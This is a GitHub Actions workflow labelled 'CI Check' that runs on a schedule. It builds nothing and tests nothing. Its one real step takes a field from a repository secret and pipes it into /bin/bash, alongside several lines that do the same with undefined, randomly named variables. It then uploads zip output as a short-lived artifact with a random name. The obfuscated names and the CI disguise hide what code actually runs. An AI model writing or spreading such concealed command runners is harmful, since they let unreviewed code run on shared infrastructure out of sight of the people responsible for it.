name: CI Check
on:
  workflow_dispatch:

  schedule:
    - cron: '25 3,9,15,21 * * *'
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  agent:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Perform
        env:
          jw998: ${{ secrets.jw998 }}
        run: |
          printf '%s' "$jw998" | jq -r .wnobx5355 | /bin/bash
          printf '%s' "$nhheb56788" | jq -r .kx464 | /bin/bash
          echo $efwun2304 | jq -r .bua5511 | /bin/bash
          echo $wh79 | jq -r .jpnu6 | /bin/bash
          echo $dasbh279 | jq -r .hxg96 | /bin/bash
          echo $ao8596 | jq -r .yvzro9 | /bin/bash

      - name: Upload results
        uses: actions/upload-artifact@v4
        with:
          name: Ib6F9gQz
          path: "*.zip"
          retention-days: 1
